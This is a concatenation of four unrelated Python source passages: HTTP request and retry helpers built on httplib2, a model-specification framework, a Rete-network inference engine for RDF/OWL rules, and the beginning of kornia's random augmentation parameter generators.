(Optional) the instance on whose connections to set the debuglevel.
"""
if http_request.loggable_body is None:
yield
return
old_level = httplib2.debuglevel
http_levels = {}
httplib2.debuglevel = level
if http is not None and getattr(http, 'connections', None) is not None:
for connection_key, connection in http.connections.items():
# httplib2 stores two kinds of values in this dict, connection
# classes and instances. Since the connection types are all
# old-style classes, we can't easily distinguish by connection
# type -- so instead we use the key pattern.
if ':' not in connection_key:
continue
http_levels[connection_key] = connection.debuglevel
connection.set_debuglevel(level)
yield
httplib2.debuglevel = old_level
if http is not None:
for connection_key, old_level in http_levels.items():
http.connections[connection_key].set_debuglevel(old_level)
class Request(object):
"""Encapsulates the data for an HTTP request.
:type url: str
:param url: the URL for the request
:type http_method: str
:param http_method: the HTTP method to use for the request
:type headers: mapping
:param headers: (Optional) headers to be sent with the request
:type body: str
:param body: body to be sent with the request
"""
def __init__(self, url='', http_method='GET', headers=None, body=''):
self.url = url
self.http_method = http_method
self.headers = headers or {}
self._body = None
self._loggable_body = None
self.body = body
@property
def loggable_body(self):
"""Request body for logging purposes
:rtype: str
:returns: The body to be logged.
"""
return self._loggable_body
@loggable_body.setter
def loggable_body(self, value):
"""Update request body for logging purposes
:type value: str
:param value: updated body
:raises: :exc:`RequestError` if the request does not have a body.
"""
if self.body is None:
raise RequestError(
'Cannot set loggable body on request with no body')
self._loggable_body = value
@property
def body(self):
"""Request body
:rtype: str
:returns: The body of the request.
"""
return self._body
@body.setter
def body(self, value):
"""Update the request body
Handles logging and length measurement.
:type value: str
:param value: updated body
"""
self._body = value
if value is not None:
# Avoid calling len() which cannot exceed 4GiB in 32-bit python.
body_length = getattr(
self._body, 'length', None) or len(self._body)
self.headers['content-length'] = str(body_length)
else:
self.headers.pop('content-length', None)
# This line ensures we don't try to print large requests.
if not isinstance(value, (type(None), six.string_types)):
self.loggable_body = '<media body>'
def _process_content_range(content_range):
"""Convert a 'Content-Range' header into a length for the response.
Helper for :meth:`Response.length`.
:type content_range: str
:param content_range: the header value being parsed.
:rtype: int
:returns: the length of the response chunk.
"""
_, _, range_spec = content_range.partition(' ')
byte_range, _, _ = range_spec.partition('/')
start, _, end = byte_range.partition('-')
return int(end) - int(start) + 1
# Note: currently the order of fields here is important, since we want
# to be able to pass in the result from httplib2.request.
_ResponseTuple = collections.namedtuple(
'HttpResponse', ['info', 'content', 'request_url'])
class Response(_ResponseTuple):
"""Encapsulates data for an HTTP response.
"""
__slots__ = ()
def __len__(self):
return self.length
@property
def length(self):
"""Length of this response.
Exposed as an attribute since using ``len()`` directly can fail
for responses larger than ``sys.maxint``.
:rtype: int or long
:returns: The length of the response.
"""
if 'content-encoding' in self.info and 'content-range' in self.info:
# httplib2 rewrites content-length in the case of a compressed
# transfer; we can't trust the content-length header in that
# case, but we *can* trust content-range, if it's present.
return _process_content_range(self.info['content-range'])
elif 'content-length' in self.info:
return int(self.info.get('content-length'))
elif 'content-range' in self.info:
return _process_content_range(self.info['content-range'])
return len(self.content)
@property
def status_code(self):
"""HTTP status code
:rtype: int
:returns: The response status code.
"""
return int(self.info['status'])
@property
def retry_after(self):
"""Retry interval (if set).
:rtype: int
:returns: interval in seconds
"""
if 'retry-after' in self.info:
return int(self.info['retry-after'])
@property
def is_redirect(self):
"""Does this response contain a redirect
:rtype: bool
:returns: True if the status code indicates a redirect and the
'location' header is present.
"""
return (self.status_code in _REDIRECT_STATUS_CODES and
'location' in self.info)
def _check_response(response):
"""Validate a response
:type response: :class:`Response`
:param response: the response to validate
:raises: :exc:`google.cloud.streaming.exceptions.RequestError` if response
is None, :exc:`~.exceptions.BadStatusCodeError` if response status
code indicates an error, or :exc:`~.exceptions.RetryAfterError`
if response indicates a retry interval.
"""
if response is None:
# Caller shouldn't call us if the response is None, but handle anyway.
raise RequestError(
'Request did not return a response.')
elif (response.status_code >= 500 or
response.status_code == TOO_MANY_REQUESTS):
raise BadStatusCodeError.from_response(response)
elif response.retry_after:
raise RetryAfterError.from_response(response)
def _reset_http_connections(http):
"""Rebuild all http connections in the httplib2.Http instance.
httplib2 overloads the map in http.connections to contain two different
types of values:
{ scheme string: connection class } and
{ scheme + authority string : actual http connection }
Here we remove all of the entries for actual connections so that on the
next request httplib2 will rebuild them from the connection types.
:type http: :class:`httplib2.Http`
:param http: the instance whose connections are to be rebuilt
"""
if getattr(http, 'connections', None):
for conn_key in list(http.connections.keys()):
if ':' in conn_key:
del http.connections[conn_key]
def _make_api_request_no_retry(http, http_request, redirections=_REDIRECTIONS):
"""Send an HTTP request via the given http instance.
This wrapper exists to handle translation between the plain httplib2
request/response types and the Request and Response types above.
:type http: :class:`httplib2.Http`
:param http: an instance which impelements the `Http` API.
:type http_request: :class:`Request`
:param http_request: the request to send.
:type redirections: int
:param redirections: Number of redirects to follow.
:rtype: :class:`Response`
:returns: an object representing the server's response
:raises: :exc:`google.cloud.streaming.exceptions.RequestError` if no
response could be parsed.
"""
connection_type = None
# Handle overrides for connection types. This is used if the caller
# wants control over the underlying connection for managing callbacks
# or hash digestion.
if getattr(http, 'connections', None):
url_scheme = parse.urlsplit(http_request.url).scheme
if url_scheme and url_scheme in http.connections:
connection_type = http.connections[url_scheme]
# Custom printing only at debuglevel 4
new_debuglevel = 4 if httplib2.debuglevel == 4 else 0
with _httplib2_debug_level(http_request, new_debuglevel, http=http):
info, content = http.request(
str(http_request.url), method=str(http_request.http_method),
body=http_request.body, headers=http_request.headers,
redirections=redirections, connection_type=connection_type)
if info is None:
raise RequestError()
response = Response(info, content, http_request.url)
_check_response(response)
return response
def make_api_request(http, http_request, retries=7,
redirections=_REDIRECTIONS):
"""Send an HTTP request via the given http, performing error/retry handling.
:type http: :class:`httplib2.Http`
:param http: an instance which implements the `Http` API.
:type http_request: :class:`Request`
:param http_request: the request to send.
:type retries: int
:param retries: Number of retries to attempt on retryable
responses (such as 429 or 5XX).
:type redirections: int
:param redirections: Number of redirects to follow.
:rtype: :class:`Response`
:returns: an object representing the server's response.
:raises: :exc:`google.cloud.streaming.exceptions.RequestError` if no
response could be parsed.
"""
retry = 0
while True:
try:
return _make_api_request_no_retry(http, http_request,
redirections=redirections)
except _RETRYABLE_EXCEPTIONS as | |
<filename>src/mframework/_mframework.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Copyright 2019-2020 Airinnova AB and the Model-Framework authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------
# Author: <NAME>
"""
Model framework
===============
.. code::
| User space | Specification
| ---------- | -------------
| |
| Model | <--- ModelSpec
| | | |
| | | |
| Feature | (<---) FeatureSpec
| | |
| | |
| (Properties) |
"""
from abc import abstractmethod, ABCMeta
from math import inf
from uuid import uuid4
from schemadict import schemadict, STANDARD_VALIDATORS
from ._log import logger
from ._utils import UniqueDict, ItemDict
PRIMITIVE_TYPES = (bool, int, float, str, dict, list, tuple)
SchemadictValidators = STANDARD_VALIDATORS
class S:
pos_int = {'type': int, '>=': 0}
def is_primitve_type(obj):
return obj in PRIMITIVE_TYPES
def check_type(var_name, var, exp_type):
if not isinstance(var, exp_type):
raise TypeError(
f"invalid type for {var_name!r}: expected {exp_type}, got {type(var)}"
)
class SpecDict(UniqueDict):
"""
Specification dictionary.
* Specification entries can only be defined once.
"""
def __setitem__(self, key, value):
if not isinstance(value, SpecEntry):
raise ValueError(f"key {key!r}: value must be instance of 'SpecEntry'")
super().__setitem__(key, value)
class SpecEntry:
def __init__(self, schema, required=1, max_items=inf, doc='', uid_required=False):
"""
Specification entry
Sensible defaults
-----------------
* The number of required items is set to 1.
* The maximum number of items is set to infinity. Setting 'max_items=1'
would also be sensible. However, it is easier to define infinity here.
"""
self.schema = schema
self.required = required
self.max_items = max_items
self.doc = doc
self.uid_required = uid_required
@property
def schema(self):
return self._schema
@schema.setter
def schema(self, schema):
self._schema = schema
@property
def required(self):
return self._required
@required.setter
def required(self, required):
schemadict({'required': S.pos_int}).validate({'required': required})
self._required = required
@property
def max_items(self):
return self._max_items
@max_items.setter
def max_items(self, max_items):
if max_items != inf:
schemadict({'max_items': S.pos_int}).validate({'max_items': max_items})
if max_items < self.required:
raise ValueError("'max_items' must be larger than the number of required items")
self._max_items = max_items
@property
def singleton(self):
return self.max_items == 1
@property
def uid_required(self):
return self._uid_required
@uid_required.setter
def uid_required(self, uid_required):
check_type('uid_required', uid_required, bool)
if uid_required and self.singleton:
raise ValueError("'uid_required' does only apply if item is singleton")
self._uid_required = uid_required
@property
def doc(self):
return self._doc
@doc.setter
def doc(self, doc):
check_type('doc', doc, str)
self._doc = doc
class _BaseSpec:
def __init__(self):
"""
Base class to store a collection of item specifications.
The term 'item' may refer to a property (e.g. the number 5) if this
class describes a feature, or it may also refer to a feature itself if
this class describes a model.
Attrs:
:uid: (str) unique identifier
:_specs: (dict) specifications (value) of items (key)
"""
self.uid = str(uuid4())
self._specs = SpecDict()
@property
def keys(self):
"""Return all spec keys"""
return list(self._specs.keys())
def __repr__(self):
return f"<Specification for {tuple(self._specs.keys())!r}>"
def _add_item_spec(self, key, schema, *, required=1, max_items=inf, doc='', uid_required=False):
"""
Add a specification entry
Args:
:key: (str) name of item to specify
:schema: (obj) specification
:required: (int) number of required items
:max_items: (int) maximum number of items
:doc: (str) documentation
:uid_required: (str) if True, UID must be set
Note:
* 'schema' should be a primitive type or a 'schemadict' if a this
class describes a feature. It should be an instance of
'FeatureSpec' if this class describes a model.
* When calling from subclass, add a user input check for 'schema'
"""
self._specs[key] = SpecEntry(schema, required, max_items, doc, uid_required)
def _provide_user_class_from_base(self, base):
"""
Return a user space class which subclasses from 'base'
Args:
:base: (obj) base class
Returns:
:UserSpace: (obj) user space class with specification reference
"""
class UserSpace(base):
_parent_specs = self._specs
_parent_uid = self.uid
return UserSpace
def get_docs(self):
"""
Return user documentation
Returns:
:docs: (dict) full documentation
"""
docs = {}
for key, spec in self._specs.items():
subdocs = None
if isinstance(getattr(spec, 'schema', None), _BaseSpec):
subdocs = spec.schema.get_docs()
docs[key] = {
'main': self._specs[key].doc,
'sub': subdocs,
'schema': self._specs[key].schema,
'required': self._specs[key].required,
'max_items': self._specs[key].max_items,
'uid_required': self._specs[key].uid_required,
}
return docs
class _UserSpaceBase:
_level = '$NONE'
_parent_specs = None
_parent_uid = None
def __init__(self):
"""
Base class for user space functionality for 'model' or 'feature'.
Attrs:
:uid: (str) unique identifier
:_specs: (dict) specifications (value) of items (key)
"""
self.uid = str(uuid4())
self._items = ItemDict()
def __repr__(self):
return f"<User space for {tuple(self._parent_specs.keys())!r}>"
@property
def keys(self):
"""Return all item keys"""
return self._items.keys()
def singleton(self, key):
"""
Return True if 'key' specifies singleton items
Args:
:key: (str) name of item
"""
return self._parent_specs[key].singleton
def from_dict(self, d):
"""
Add user values from a dictionary
Args:
:d: (dict) key-value pairs
Returns:
:self: (obj) reference to self
"""
check_type(f'{d!r}', d, dict)
for key, value in d.items():
if key.startswith('$'):
continue
self._check_key_in_spec(key)
if self.singleton(key):
self.set(key, value[0])
else:
self.add_many(key, *value)
return self
def to_dict(self):
"""
Represent model/feature as a dictionary
Returns:
:dictionary: (dict) key-value pairs
"""
return {
'$level': self._level,
'$uid': self.uid,
**{k: list(v.values()) for k, v in self._items.items()}
}
def get_default(self, key):
"""
Return the model/feature default values
"""
raise NotImplementedError
def set(self, key, value):
"""
Set a value (singleton)
Args:
:key: (str) name of item to specify
:value: (obj) value of the item to specify
"""
self._check_key_in_spec(key)
self._check_against_schema(key, value)
if not self.singleton(key):
raise RuntimeError(f"key {key!r}: method 'set()' does not apply, try 'add()'")
logger.debug(f"Set property {key!r} = {value!r} in {self!r}")
del self._items[key]
self._items[key] = value
def add(self, key, value, uid=None):
"""
Add a value (non-singleton)
Args:
:key: (str) name of item to specify
:value: (obj) value of the item to specify
"""
self._check_key_in_spec(key)
self._check_below_max_items(key)
self._check_uid_required(key, uid)
self._check_against_schema(key, value)
if self.singleton(key):
raise RuntimeError(f"key {key!r}: method 'add()' does not apply, try 'set()'")
logger.debug(f"Add property {key!r} = {value!r} (num: {len(self._items[key])+1}) in {self!r}")
# "Append" values to dictionary
self._items[key] = value
if uid is not None:
self._items.assign_uid(key, uid)
def add_many(self, key, *values):
"""
Add multiple items (non-singleton)
* Method does not support keys which require UIDs
Args:
:key: (str) name of property to specify
:values: (obj) values of the item to specify
"""
for value in values:
self.add(key, value)
def get(self, key, default=None, *, uid=None):
"""
Return a value (singleton/non-singleton)
Args:
:key: (str) name of item
:uid: (str) return a named item
:default: (obj) value returned if value is not found in items
Returns:
:value: (obj) value of the item
"""
# Always throw error if key is not in specification
self._check_key_in_spec(key)
# Return the default value if the key is not in the '_items' dict. Note
# that '_items' returns an empty list if the key is not in the dict.
if not self._items[key]:
return default
if self.singleton(key):
logger.warning(f"ignoring UID {uid!r} since not applicable for singletons")
return self._items[key][0]
else:
if uid is not None:
return self._items.get_by_uid(key, uid)
else:
return list(self._items[key].values())
def iter(self, key):
"""
Return an iterator for values of 'key' (non-singleton)
Args:
:key: (str) name of item
"""
if self.singleton(key):
raise KeyError(f"Method 'iter()' not supported for item {key!r}, try 'get()'")
yield from list(self._items[key].values())
def iter_uids(self, key):
"""
Return an iterator for values of 'key' (non-singleton)
Args:
:key: (str) name of item
"""
if self.singleton(key):
raise KeyError(f"Method 'iter()' not supported for item {key!r}, try 'get()'")
# TODO !!!
yield from self._items.iter_uids(key)
def get_uid(self, key, idx):
return self._items.get_uid(key, idx)
def len(self, key):
return len(self._items[key])
def clear(self):
raise NotImplementedError
def remove(self):
raise NotImplementedError
def _check_key_in_spec(self, key):
if key not in self._parent_specs.keys():
raise KeyError(f"key {key!r} is not in specification")
def _check_below_max_items(self, key):
if not len(self._items[key].values()) < self._parent_specs[key].max_items:
raise RuntimeError(f"maximum number of items for key {key!r} has been set")
def _check_uid_required(self, key, uid):
if self._parent_specs[key].uid_required and uid is None:
raise RuntimeError(f"key {key!r} requires a UID")
def _check_against_schema(self, key, value):
# TODO: look over logic
if isinstance(self._parent_specs[key].schema, dict):
if not isinstance(value, dict):
schemadict(
{key: self._parent_specs[key].schema},
validators=SchemadictValidators,
).validate({key: value})
else:
# Schema has schemadict format
schemadict(
self._parent_specs[key].schema,
validators=SchemadictValidators
).validate(value)
| |
[]
for s, p, o in self.inferredFacts.triples((None, RDF.type, None)):
if s in unionClosureG.predicates() or\
s in [_s for _s, _p, _o in
unionClosureG.triples_choices(
(None,
RDF.type,
[OWL_NS.Class,
OWL_NS.Restriction]))]:
self.inferredFacts.remove((s, p, o))
return noNegFacts
def setupDescriptionLogicProgramming(self,
owlN3Graph,
expanded=[],
addPDSemantics=True,
classifyTBox=False,
constructNetwork=True,
derivedPreds=[],
ignoreNegativeStratus=False,
safety=DATALOG_SAFETY_NONE):
rt = [rule
for rule in MapDLPtoNetwork(self,
owlN3Graph,
complementExpansions=expanded,
constructNetwork=constructNetwork,
derivedPreds=derivedPreds,
ignoreNegativeStratus=ignoreNegativeStratus,
safety=safety)]
if ignoreNegativeStratus:
rules, negRules = rt
rules = set(rules)
self.negRules = set(negRules)
else:
rules = set(rt)
if constructNetwork:
self.rules.update(rules)
additionalRules = set(AdditionalRules(owlN3Graph))
if addPDSemantics:
from FuXi.Horn.HornRules import HornFromN3
additionalRules.update(HornFromN3(StringIO(non_DHL_OWL_Semantics)))
if constructNetwork:
for rule in additionalRules:
self.buildNetwork(iter(rule.formula.body),
iter(rule.formula.head),
rule)
self.rules.add(rule)
else:
rules.update(additionalRules)
if constructNetwork:
rules = self.rules
# noRules = len(rules)
if classifyTBox:
self.feedFactsToAdd(generateTokenSet(owlN3Graph))
# print("##### DLP rules fired against OWL/RDF TBOX", self)
return rules
def reportSize(self, tokenSizeThreshold=1200, stream=sys.stdout):
for pattern, node in list(self.nodes.items()):
if isinstance(node, BetaNode):
for largeMem in [i for i in iter(node.memories.values()) if len(i) > tokenSizeThreshold]:
if largeMem:
print("Large apha node memory extent: ")
pprint(pattern)
print(len(largeMem))
def reportConflictSet(self, closureSummary=False, stream=sys.stdout):
tNodeOrder = [tNode
for tNode in self.terminalNodes
if self.instantiations.get(tNode, 0)]
tNodeOrder.sort(key=lambda x: self.instantiations[x], reverse=True)
for termNode in tNodeOrder:
print(termNode)
print("\t", termNode.clauseRepresentation())
print("\t\t%s instantiations" % self.instantiations[termNode])
if closureSummary:
print(self.inferredFacts.serialize(
destination=stream, format='turtle'))
def parseN3Logic(self, src):
store = N3RuleStore(additionalBuiltins=self.ruleStore.filters)
Graph(store).parse(src, format='n3')
store._finalize()
assert len(store.rules), "There are no rules passed in."
from FuXi.Horn.HornRules import Ruleset
for rule in Ruleset(n3Rules=store.rules,
nsMapping=self.nsMap):
self.buildNetwork(iter(rule.formula.body),
iter(rule.formula.head),
rule)
self.rules.add(rule)
self.alphaNodes = [node for node in list(self.nodes.values()) if isinstance(node, AlphaNode)]
self.alphaBuiltInNodes = [node for node in list(self.nodes.values()) if isinstance(node, BuiltInAlphaNode)]
def __repr__(self):
total = 0
for node in list(self.nodes.values()):
if isinstance(node, BetaNode):
total += len(node.memories[LEFT_MEMORY])
total += len(node.memories[RIGHT_MEMORY])
return "<Network: %s rules, %s nodes, %s tokens in working memory, %s inferred tokens>" % (
len(self.terminalNodes), len(self.nodes), total, len(self.inferredFacts))
def closureGraph(self, sourceGraph, readOnly=True, store=None):
if readOnly:
if store is None and not sourceGraph:
store = Graph().store
store = store is None and sourceGraph.store or store
roGraph = ReadOnlyGraphAggregate([sourceGraph, self.inferredFacts],
store=store)
roGraph.namespace_manager = NamespaceManager(roGraph)
for srcGraph in [sourceGraph, self.inferredFacts]:
for prefix, uri in srcGraph.namespaces():
roGraph.namespace_manager.bind(prefix, uri)
return roGraph
else:
cg = ConjunctiveGraph()
cg += sourceGraph
cg += self.inferredFacts
return cg
def _setupDefaultRules(self):
"""
Checks every alpha node to see if it may match against a 'universal truth' (one w/out a LHS)
"""
for node in list(self.nodes.values()):
if isinstance(node, AlphaNode):
node.checkDefaultRule(self.universalTruths)
def clear(self):
self.nodes = {}
self.alphaPatternHash = {}
self.rules = set()
for alphaPattern in xcombine(('1', '0'), ('1', '0'), ('1', '0')):
self.alphaPatternHash[tuple(alphaPattern)] = {}
self.proofTracers = {}
self.terminalNodes = set()
self.justifications = {}
self._resetinstantiationStats()
self.workingMemory = set()
self.dischargedBindings = {}
def reset(self, newinferredFacts=None):
"Reset the network by emptying the memory associated with all Beta Nodes nodes"
for node in list(self.nodes.values()):
if isinstance(node, BetaNode):
node.memories[LEFT_MEMORY].reset()
node.memories[RIGHT_MEMORY].reset()
self.justifications = {}
self.proofTracers = {}
self.inferredFacts = newinferredFacts if newinferredFacts is not None else Graph()
self.workingMemory = set()
self._resetinstantiationStats()
def fireConsequent(self, tokens, termNode, debug=False):
"""
"In general, a p-node also contains a specifcation of what production it corresponds to | the
name of the production, its right-hand-side actions, etc. A p-node may also contain information
about the names of the variables that occur in the production. Note that variable names
are not mentioned in any of the Rete node data structures we describe in this chapter. This is
intentional |it enables nodes to be shared when two productions have conditions with the same
basic form, but with different variable names."
Takes a set of tokens and the terminal Beta node they came from
and fires the inferred statements using the patterns associated
with the terminal node. Statements that have been previously inferred
or already exist in the working memory are not asserted
"""
if debug:
print("%s from %s" % (tokens, termNode))
# newTokens = []
termNode.instanciatingTokens.add(tokens)
def iterCondition(condition):
if isinstance(condition, Exists):
return condition.formula
return isinstance(condition, SetOperator) and condition or iter([condition])
def extractVariables(term, existential=True):
if isinstance(term, existential and BNode or Variable):
yield term
elif isinstance(term, Uniterm):
for t in term.toRDFTuple():
if isinstance(t, existential and BNode or Variable):
yield t
#replace existentials in the head with new BNodes!
BNodeReplacement = {}
for rule in termNode.rules:
if isinstance(rule.formula.head, Exists):
for bN in rule.formula.head.declare:
if not isinstance(rule.formula.body, Exists) or \
bN not in rule.formula.body.declare:
BNodeReplacement[bN] = BNode()
for rhsTriple in termNode.consequent:
if BNodeReplacement:
rhsTriple = tuple([BNodeReplacement.get(term, term) for term in rhsTriple])
if debug:
if not tokens.bindings:
tokens._generateBindings()
key = tuple([None if isinstance(item, BNode) else item for item in rhsTriple])
override, executeFn = termNode.executeActions.get(key, (None, None))
if override:
#There is an execute action associated with this production
#that is attaced to the given consequent triple and
#is meant to perform all of the production duties
#(bypassing the inference of triples, etc.)
executeFn(termNode, None, tokens, None, debug)
else:
for inferredTriple, binding in _mulPatternWithSubstitutions(tokens, rhsTriple, termNode):
if [term for term in inferredTriple if isinstance(term, Variable)]:
#Unfullfilled bindings (skip non-ground head literals)
if executeFn:
#The indicated execute action is supposed to be triggered
#when the indicates RHS triple is inferred for the
#(even if it is not ground)
executeFn(termNode, inferredTriple, tokens, binding, debug)
continue
# if rhsTriple[1].find('subClassOf_derived')+1:import pdb;pdb.set_trace()
inferredToken = ReteToken(inferredTriple)
self.proofTracers.setdefault(inferredTriple, []).append(binding)
self.justifications.setdefault(inferredTriple, set()).add(termNode)
if termNode.filter and inferredTriple not in self.filteredFacts:
self.filteredFacts.add(inferredTriple)
if inferredTriple not in self.inferredFacts and inferredToken not in self.workingMemory:
# if (rhsTriple == (Variable('A'), RDFS.RDFSNS['subClassOf_derived'], Variable('B'))):
# import pdb;pdb.set_trace()
if debug:
print("Inferred triple: ", inferredTriple, " from ", termNode.clauseRepresentation())
inferredToken.debug = True
self.inferredFacts.add(inferredTriple)
self.addWME(inferredToken)
currIdx = self.instantiations.get(termNode, 0)
currIdx += 1
self.instantiations[termNode] = currIdx
if executeFn:
#The indicated execute action is supposed to be triggered
#when the indicates RHS triple is inferred for the
#first time
executeFn(termNode, inferredTriple, tokens, binding, debug)
if self.goal is not None and self.goal in self.inferredFacts:
raise InferredGoal("Proved goal " + repr(self.goal))
else:
if debug:
print("Inferred triple skipped: ", inferredTriple)
if executeFn:
#The indicated execute action is supposed to be triggered
#when the indicates RHS triple is inferred for the
#first time
executeFn(termNode, inferredTriple, tokens, binding, debug)
def addWME(self, wme):
"""
procedure add-wme (w: WME) exhaustive hash table versiong
let v1, v2, and v3 be the symbols in the three fields of w
alpha-mem = lookup-in-hash-table (v1, v2, v3)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
alpha-mem = lookup-in-hash-table (v1, v2, *)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
alpha-mem = lookup-in-hash-table (v1, *, v3)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
...
alpha-mem = lookup-in-hash-table (*, *, *)
if alpha-mem then alpha-memory-activation (alpha-mem, w)
end
"""
# print(wme.asTuple())
for termComb, termDict in iteritems(self.alphaPatternHash):
for alphaNode in termDict.get(wme.alphaNetworkHash(termComb), []):
# print("\t## Activated AlphaNode ##")
# print("\t\t", termComb, wme.alphaNetworkHash(termComb))
# print("\t\t", alphaNode)
alphaNode.activate(wme.unboundCopy())
def feedFactsToAdd(self, tokenIterator):
"""
Feeds the network an iterator of facts / tokens which are fed to the alpha nodes
which propagate the matching process through the network
"""
for token in tokenIterator:
self.workingMemory.add(token)
# print(token.unboundCopy().bindingDict)
self.addWME(token)
def _findPatterns(self, patternList):
rt = []
for betaNodePattern, alphaNodePatterns in \
[(patternList.__getslice__(0, -i), patternList.__getslice__(-i, len(patternList))) for i in range(1, len(patternList))]:
# [(patternList[:-i], patternList[-i:]) for i in xrange(1, len(patternList))]:
assert isinstance(betaNodePattern, HashablePatternList)
assert isinstance(alphaNodePatterns, HashablePatternList)
if betaNodePattern in self.nodes:
rt.append(betaNodePattern)
rt.extend([HashablePatternList([aPattern]) for aPattern in alphaNodePatterns])
return rt
for alphaNodePattern in patternList:
rt.append(HashablePatternList([alphaNodePattern]))
return rt
def createAlphaNode(self, currentPattern):
"""
"""
if isinstance(currentPattern, N3Builtin):
node = BuiltInAlphaNode(currentPattern)
else:
node = AlphaNode(currentPattern, self.ruleStore.filters)
self.alphaPatternHash[node.alphaNetworkHash()].setdefault(node.alphaNetworkHash(groundTermHash=True), []).append(node)
if not isinstance(node, BuiltInAlphaNode) and node.builtin:
s, p, o = currentPattern
node = BuiltInAlphaNode(N3Builtin(p, self.ruleStore.filters[p](s, o), s, o))
return node
def _resetinstantiationStats(self):
self.instantiations = dict([(tNode, 0) for tNode in self.terminalNodes])
def checkDuplicateRules(self):
checkedClauses = {}
for tNode in self.terminalNodes:
for rule in tNode.rules:
collision = checkedClauses.get(rule.formula)
assert collision is None, "%s collides with %s" % (
tNode, checkedClauses[rule.formula])
checkedClauses.setdefault(tNode.rule.formula, []).append(tNode)
def registerReteAction(self, headTriple, override, executeFn):
"""
Register the given execute function for any rule with the
given head using the override argument to determine whether or
not the action completely handles the firing of the rule.
The signature of the execute action is as follows:
def someExecuteAction(tNode, inferredTriple, token, binding):
.. pass ..
"""
for tNode in self.terminalNodes:
for rule in tNode.rules:
if | |
<filename>kornia/augmentation/random_generator/random_generator.py
from typing import cast, Dict, Optional, Tuple, Union
import torch
from torch.distributions import Bernoulli
from kornia.geometry import bbox_generator
from kornia.utils import _extract_device_dtype
from ..utils import _adapted_beta, _adapted_sampling, _adapted_uniform, _common_param_check, _joint_range_check
def random_prob_generator(
batch_size: int,
p: float = 0.5,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> torch.Tensor:
r"""Generate random probabilities for a batch of inputs.
Args:
batch_size (int): the number of images.
p (float): probability to generate an 1-d binary mask. Default value is 0.5.
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
torch.Tensor: parameters to be passed for transformation.
- probs (torch.Tensor): element-wise probabilities with a shape of (B,).
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
if not isinstance(p, (int, float)) or p > 1 or p < 0:
raise TypeError(f"The probability should be a float number within [0, 1]. Got {type(p)}.")
_bernoulli = Bernoulli(torch.tensor(float(p), device=device, dtype=dtype))
probs_mask: torch.Tensor = _adapted_sampling((batch_size,), _bernoulli, same_on_batch).bool()
return probs_mask
def random_color_jitter_generator(
batch_size: int,
brightness: Optional[torch.Tensor] = None,
contrast: Optional[torch.Tensor] = None,
saturation: Optional[torch.Tensor] = None,
hue: Optional[torch.Tensor] = None,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> Dict[str, torch.Tensor]:
r"""Generate random color jiter parameters for a batch of images.
Args:
batch_size (int): the number of images.
brightness (torch.Tensor, optional): Brightness factor tensor of range (a, b).
The provided range must follow 0 <= a <= b <= 2. Default value is [0., 0.].
contrast (torch.Tensor, optional): Contrast factor tensor of range (a, b).
The provided range must follow 0 <= a <= b. Default value is [0., 0.].
saturation (torch.Tensor, optional): Saturation factor tensor of range (a, b).
The provided range must follow 0 <= a <= b. Default value is [0., 0.].
hue (torch.Tensor, optional): Saturation factor tensor of range (a, b).
The provided range must follow -0.5 <= a <= b < 0.5. Default value is [0., 0.].
same_on_batch (bool): apply the same transformation across the batch. Default: False.
device (torch.device): the device on which the random numbers will be generated. Default: cpu.
dtype (torch.dtype): the data type of the generated random numbers. Default: float32.
Returns:
params Dict[str, torch.Tensor]: parameters to be passed for transformation.
- brightness_factor (torch.Tensor): element-wise brightness factors with a shape of (B,).
- contrast_factor (torch.Tensor): element-wise contrast factors with a shape of (B,).
- hue_factor (torch.Tensor): element-wise hue factors with a shape of (B,).
- saturation_factor (torch.Tensor): element-wise saturation factors with a shape of (B,).
- order (torch.Tensor): applying orders of the color adjustments with a shape of (4). In which,
0 is brightness adjustment; 1 is contrast adjustment;
2 is saturation adjustment; 3 is hue adjustment.
Note:
The generated random numbers are not reproducible across different devices and dtypes.
"""
_common_param_check(batch_size, same_on_batch)
_device, _dtype = _extract_device_dtype([brightness, contrast, hue, saturation])
brightness = torch.as_tensor([0.0, 0.0] if brightness is None else brightness, device=device, dtype=dtype)
contrast = torch.as_tensor([0.0, 0.0] if contrast is None else contrast, device=device, dtype=dtype)
hue = torch.as_tensor([0.0, 0.0] if hue is None else hue, device=device, dtype=dtype)
saturation = torch.as_tensor([0.0, 0.0] if saturation is None else saturation, device=device, dtype=dtype)
_joint_range_check(brightness, "brightness", (0, 2))
_joint_range_check(contrast, "contrast", (0, float('inf')))
_joint_range_check(hue, "hue", (-0.5, 0.5))
_joint_range_check(saturation, "saturation", (0, float('inf')))
brightness_factor = _adapted_uniform((batch_size,), brightness[0], brightness[1], same_on_batch)
contrast_factor = _adapted_uniform((batch_size,), contrast[0], contrast[1], same_on_batch)
hue_factor = _adapted_uniform((batch_size,), hue[0], hue[1], same_on_batch)
saturation_factor = _adapted_uniform((batch_size,), saturation[0], saturation[1], same_on_batch)
return dict(
brightness_factor=brightness_factor.to(device=_device, dtype=_dtype),
contrast_factor=contrast_factor.to(device=_device, dtype=_dtype),
hue_factor=hue_factor.to(device=_device, dtype=_dtype),
saturation_factor=saturation_factor.to(device=_device, dtype=_dtype),
order=torch.randperm(4, device=_device, dtype=_dtype).long(),
)
def random_perspective_generator(
batch_size: int,
height: int,
width: int,
distortion_scale: torch.Tensor,
same_on_batch: bool = False,
device: torch.device = torch.device('cpu'),
dtype: torch.dtype = torch.float32,
) -> Dict[str, torch.Tensor]:
r"""Get parameters for ``perspective`` for a random perspective transform.
Args:
batch_size (int): the tensor batch size.
height (int) : height of the image.
